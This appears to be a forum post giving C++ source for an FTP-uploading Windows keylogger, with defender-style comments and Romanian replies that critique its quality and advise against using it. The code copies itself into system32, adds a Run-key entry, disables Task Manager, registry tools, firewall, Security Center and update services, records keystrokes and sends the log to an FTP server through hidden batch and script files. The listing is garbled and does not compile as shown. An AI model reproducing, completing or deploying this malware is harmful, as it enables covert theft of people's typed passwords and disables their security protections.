Skream Example

[C++] Ftp Keylogger 1 Source Code


#include <windows.h>
#include <Winuser.h>
#include <string>
#include <fstream>
using namespace std;

// Relative name of the batch file that OpenBatFile() launches; main() writes a
// file with this name under C:\WINDOWS\system32.
char BatchFile[20] = "system.bat";
// Passed as the parameter string to ShellExecute in main(); never assigned in the
// visible code.
char* params;

// Thread routine started from main() via CreateThread. After a 300000 ms
// (5 minute) sleep it launches BatchFile through ShellExecute with SW_HIDE, so no
// console window is shown to the user.
// Defender view: a process that starts a batch file with a hidden window after
// a fixed delay is a behavioural indicator; process-creation telemetry for the
// resulting cmd.exe / ftp.exe children is where this shows up.
// NOTE(review): the loop header below is truncated on this page and the listing
// does not compile as shown; presumably an unconditional loop - confirm against
// the original post.
DWORD WINAPI OpenBatFile(LPVOID)
{
for( {
Sleep(300000);
ShellExecute(NULL* "open"* BatchFile* NULL* NULL* SW_HIDE);}
}


// Translates a Windows virtual-key code into the text that main() appends to the
// log file. Returns an empty string for codes that match none of the branches.
// Forensic note: named keys are written as bracketed tags ("[SHIFT]", "[CTRL]",
// ...), so a recovered log contains those literal markers between typed text.
std::string GetKey(int Key)
{
std::string KeyString = "";

// 8 is VK_BACK (Backspace), although the tag written is "[delete]".
if (Key == 8)
KeyString = "[delete]";
// 13 is VK_RETURN: recorded as a line break.
else if (Key == 13)
KeyString = "\n";
// 32 is VK_SPACE.
else if (Key == 32)
KeyString = " ";
else if (Key == VK_PAUSE)
KeyString = "[PAUSE]";
else if (Key == VK_CAPITAL)
KeyString = "[CAPITAL]";
else if (Key == VK_SHIFT)
KeyString = "[SHIFT]";
else if (Key == VK_TAB)
KeyString = "[TABULATOR]";
else if (Key == VK_CONTROL)
KeyString = "[CTRL]";
else if (Key == VK_ESCAPE)
KeyString = "[ESCAPE]";
else if (Key == VK_END)
KeyString = "[END]";
else if (Key == VK_HOME)
KeyString = "[HOME]";
else if (Key == VK_LEFT)
KeyString = "[left]";
else if (Key == VK_RIGHT)
KeyString = "[right]";
else if (Key == VK_UP)
KeyString = "[UP]";
else if (Key == VK_DOWN)
KeyString = "[DOWN]";
else if (Key == VK_SNAPSHOT)
KeyString = "[SNAPSHOT]";
else if (Key == VK_NUMLOCK)
KeyString = "[NUMLOCK]";
// 190 is VK_OEM_PERIOD and 110 is VK_DECIMAL (numeric keypad).
else if (Key == 190 || Key == 110)
KeyString = ".";

// 96..105 are the numeric-keypad digit keys; subtracting 48 yields the ASCII
// digit, which is assigned to the string as a single character.
else if (Key >=96 && Key <= 105)
KeyString = Key-48;
// 48..57 are the top-row digit keys (their codes equal the ASCII digits); the
// range as written also admits 58 and 59.
else if (Key > 47 && Key < 60)
KeyString = Key;
// This is a separate if, not part of the chain above. The condition holds for
// every Key value, so only the inner range test selects anything.
if (Key != VK_LBUTTON || Key != VK_RBUTTON)
{
// 65..90 are the letter keys 'A'..'Z'.
if (Key > 64 && Key < 91)
{
// Any non-zero GetKeyState(VK_CAPITAL) result keeps the upper-case letter;
// otherwise 32 is added to obtain the lower-case ASCII letter. The Shift state
// is not consulted here, so letter case in a recovered log follows this test only.
if (GetKeyState(VK_CAPITAL))
KeyString = Key;
else
{
Key = Key + 32;
KeyString = Key;
}
}
}

return KeyString;
}

// Entry point of the sample. In order, the visible code: copies its own image
// into the system directory, registers that copy under an HKLM Run value, sets
// policy values that restrict Task Manager and the registry tools, drops batch
// and script files under C:\WINDOWS\system32, starts a thread that launches the
// FTP upload batch file, and then polls the keyboard state forever, appending
// to C:\WINDOWS\system32\log.txt.
// Every path, value name and file name below is a host indicator a defender can
// search for. No API return value is checked anywhere in this function.
// NOTE(review): the listing is garbled by the page extraction and does not
// compile as shown.
int main()
{
// Block-scope declaration of WinMain only; nothing in the visible code calls it.
int WINAPI WinMain (HINSTANCE hThisInstance*
HINSTANCE hPrevInstance*
LPSTR lpszArgument*
int nFunsterStil);

char path[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

// Self-copy: the running executable's path is resolved and the file is copied to
// <system directory>\borg.exe. An unexpected borg.exe in the system directory is
// a file-system indicator for this sample.
char sys[MAX_PATH];
GetModuleFileName(GetModH* path* sizeof(path));
GetSystemDirectory(sys* sizeof(sys));
strcat(sys* "\\borg.exe");
CopyFile(path* sys* false);

HKEY hKey* hKey2;

// Two bytes: the character '0' (0x30) and the terminating NUL.
unsigned char reg[2] = "0";

// Persistence: a value named "MS-Windows-secretly" under the HKLM Run key points
// at the copied executable. The data length passed is sizeof(sys), i.e. the
// whole MAX_PATH buffer rather than the string length.
RegOpenKeyEx(HKEY_LOCAL_MACHINE*"Software\\Microsoft\\Windows\\CurrentVersion\\Run"* 0* KEY_SET_VALUE* &hKey );
RegSetValueEx(hKey* "MS-Windows-secretly"* 0* REG_SZ*(const unsigned char*)sys* sizeof(sys));
// Defence impairment: writes a "DisableTaskMgr" value under the current user's
// Policies\System key, typed REG_DWORD but supplied from the 2-byte reg buffer.
RegCreateKey(HKEY_CURRENT_USER*"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"*&hKey2);
RegSetValueEx(hKey2*"DisableTaskMgr"*0*REG_DWORD*reg*sizeof(reg));
RegCloseKey(hKey)*(hKey2);

// Removes any keystroke log left by a previous run.
DeleteFile("C:\\WINDOWS\\system32\\log.txt");

// Drops update.bat. Its commands stop the "Security Center" and SharedAccess
// services, build %Temp%.\kill.reg with Start=dword:00000004 (the "disabled"
// start type) for the SharedAccess, wuauserv and wscsvc service keys, import it
// silently with REGEDIT /S, then delete the .reg file and the batch file itself.
// Forensic note: the doubled quotes inside these literals are adjacent C++
// string literals, which the compiler concatenates, so no quote characters are
// written to the file.
ofstream FWUP;
FWUP.open("C:\\WINDOWS\\system32\\update.bat");
FWUP<<"@echo off\n";
FWUP<<"net stop ""Security Center""\n";
FWUP<<"net stop SharedAccess\n";
FWUP<<"> ""%Temp%.\\kill.reg"" ECHO REGEDIT4\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\\kill.reg""\n";
FWUP<<"DEL ""%Temp%.\\kill.reg""\n";
FWUP<<"DEL %0\n";
FWUP.close();

// Drops syssvr.bat, which uses "reg add" to set "disableregistrytools" to 1
// under the current user's Policies\System key.
ofstream disable;
disable.open("C:\\WINDOWS\\system32\\syssvr.bat");
disable<<"@echo off\n";
disable<<"reg add ""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NUL\n";
disable.close();

// Drops an ftp.exe command script under the name drivers\config.sys. The
// server, user name and password lines are the poster's placeholders. The script
// sends log.txt in ASCII mode. Credentials in such a script sit in clear text on
// disk and cross the network unencrypted, which helps an investigator recover
// the upload destination.
ofstream log;
log.open("C:\\WINDOWS\\system32\\drivers\\config.sys");
log<<"OPEN ftpserver\n";
log<<"USER username\n";
log<<"ftppassword\n";
log<<"ASCII\n";
log<<"SEND C:\\WINDOWS\\system32\\log.txt\n";
log<<"BYE\n";
log<<"exit\n";
log.close();

// Drops system.bat, which runs ftp.exe non-interactively (-n -i) with the script
// above (-s:). Detection: ftp.exe started with -s: pointing into system32\drivers.
ofstream Ausgabe;
Ausgabe.open("C:\\WINDOWS\\system32\\system.bat");
Ausgabe<<"ftp -n -i -s:C:\\WINDOWS\\system32\\drivers\\config.sys\n";
Ausgabe<<"bye\n";
Ausgabe<<"exit\n";
Ausgabe.close();

// Runs the two defence-impairment batch files with hidden windows. params is the
// file-level pointer that the visible code never assigns.
ShellExecute(NULL* NULL* "C:\\WINDOWS\\system32\\syssvr.bat"* params* NULL* SW_HIDE);
ShellExecute(NULL* NULL* "C:\\WINDOWS\\system32\\update.bat"* params* NULL* SW_HIDE);

DWORD OpenBatch;

// Starts OpenBatFile on its own thread; the returned handle is not used again.
HANDLE hOpenBatFile = CreateThread(NULL* 0* OpenBatFile* 0* 0* &OpenBatch);

// The keystroke log is opened in append mode.
std::string Filename = "C:\\WINDOWS\\system32\\log.txt";
std::string TempString = "";
std::fstream FStream;
FStream.open(Filename.c_str()* std::fstream::out | std::fstream::app);

// Capture loop: polls key state rather than installing a keyboard hook.
while(true)
{
// 5 ms pause between polling passes (original note: "0% CPU").
Sleep(5);

// Scans virtual-key codes 8 through 190 on every pass.
for(int i = 8; i < 191; i++)
{
// == binds tighter than &, so this evaluates GetAsyncKeyState(i) & (1 == 1),
// i.e. it tests the low-order bit of the result.
if(GetAsyncKeyState(i)&1 ==1)
{
TempString = GetKey (i);

// Each recorded key is written, then the file is closed and reopened, so the
// log on disk is updated per keystroke and file-write telemetry is very chatty.
FStream.write(TempString.c_str()* TempString.size());
FStream.close();
FStream.open(Filename.c_str()* std::fstream::out | std::fstream::app);
}
}
}
}


De fapt avand in vedere ca nu am nici un fel de experienta in troieni si asa ceva chiar si prost scris e informativ, am incercat sa gasesc surse in c++ pentru troieni si in alte dati si nu prea am gasit. Asa ca mie unul mi se pare informativ.

Ca o adaugare, nu am treaba cu chestii din astea, nu am folosit niciodata nici un tip de malware pentru a obtine nimic, nu am incercat niciodata sa obtin parola cuiva sau sa fac rost de "loguri" pentru diferite chestii. Mie imi place sa vad cum lucreaza, iar in cazul malware-urilor sa stiu cum sa le scot :)

Si ca sa iti raspund la afirmatie, de obicei ma uit la orice are c++ in titlu, la posturile lui nytro nu am mai postat pentru ca nu puteam sa ii dau rep, si sa postez aiurea nu avea rost, in plus nu puteam sa ma dau cu parerea acolo deoarece e un pic cam avansat pentru mine, cam la fel ca si asta...


if(GetAsyncKeyState(i)&1 ==1)

Nu are keyboard hook, va consuma ceva procesor, foloseste metoda clasica: verifica pentru fiecare tasta in parte daca e apasata, nu seteaza un hook pentru a primi o "notificare" in caz ca e apasata o tasta.

Si e cam prost scris. Adica e stupid sa scrii un fisier ".reg" pentru a scrie in Registry cand exista Registry API, si de asemenea, sa uploadezi pe FTP cu un fisier ".bat" cand exista Winsock si protocolul FTP e tot stupid. Dar na, e mult mai usor asa de aceea probabil au fost preferate aceste alternative.

Ideea principala e ca nu vi-l recomand, nici sa il folositi, si sa il studiati nici nu se pune problema.

Edited by Nytro
